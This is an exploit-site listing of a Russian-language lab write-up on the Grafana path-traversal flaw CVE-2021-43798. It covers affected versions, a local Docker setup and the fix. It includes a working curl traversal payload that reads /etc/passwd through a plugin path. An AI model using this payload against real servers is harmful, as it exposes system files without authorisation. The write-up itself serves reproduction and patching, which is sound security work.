Sploitus

Exploit for CVE-2021-43798

kitploit · 2026-08-31

Exploit Code

MARKDOWN70 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-LIM-AHMIN-CVE-2021-43798
# CVE-2021-43798

### 1\. Резюме

  * Grafana — это платформа с открытым исходным кодом для мониторинга и управления данными. В указанных ниже версиях существует уязвимость Path Traversal, позволяющая манипулировать путями к файлам с помощью специальных символов, таких как ../. 
    * 8.0.0 и выше, ниже 8.0.7
    * 8.1.0 и выше, ниже 8.1.8
    * 8.2.0 и выше, ниже 8.2.7
    * 8.3.0
  * Уязвимый путь: <grafana_host_url>/public/plugins/<plugin_id>/, где <plugin_id> — это идентификатор установленного плагина. Подтвердить уязвимый путь можно по ссылке ниже. 
    * https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p  
  
  




### 2\. Настройка и запуск уязвимой среды

#### 2.1 Используемая среда

  * Версия Grafana 8.2.5



#### 2.2 Способ запуска

root@kitploit:~
    
    
    docker-compose up -d
    

  
  


### 3\. Воспроизведение уязвимости

  * Просмотр открытого экрана ![Скриншот 2026-07-11 20 31 04](https://assets.kitploit.com/production/public/readmes/37522/1d90781ab1eca05c73f7166a9a88735102d98a9f3519e9e5d5271bdf0ab9ca07.png)



  
  


  * Результат выполнения



`curl --path-as-is http://localhost:3000/public/plugins/alertlist/../../../../../../../../etc/passwd`  
Таким образом удалось получить доступ к etc/passwd.

![Скриншот 2026-07-11 19 59 12](https://assets.kitploit.com/production/public/readmes/37522/98cd3bbf9c842093566f3f086a3f00f283670390723d1ffedfa0bf8f13c9aeb7.png)

### 4\. Заключение (меры реагирования)

  * Если вы используете уязвимую версию, необходимо обновиться до исправленных версий: 8.3.1, 8.2.7, 8.1.8, 8.0.7.
  * Для предотвращения уязвимости Path Traversal следует применять подход белого списка (whitelist), разрешающий доступ только к разрешённым путям, а также осуществлять проверку пользовательского ввода и нормализацию путей, чтобы ограничить аномальный доступ к путям, таким как перемещение вверх по директориям (../).



### Справочные материалы

  * https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p
  * https://vulners.com/cve/CVE-2021-43798
  * https://labex.io/ko/tutorials/nmap-how-to-control-file-path-traversal-420498
  * https://www.youtube.com/watch?v=j8NkNyoYZzU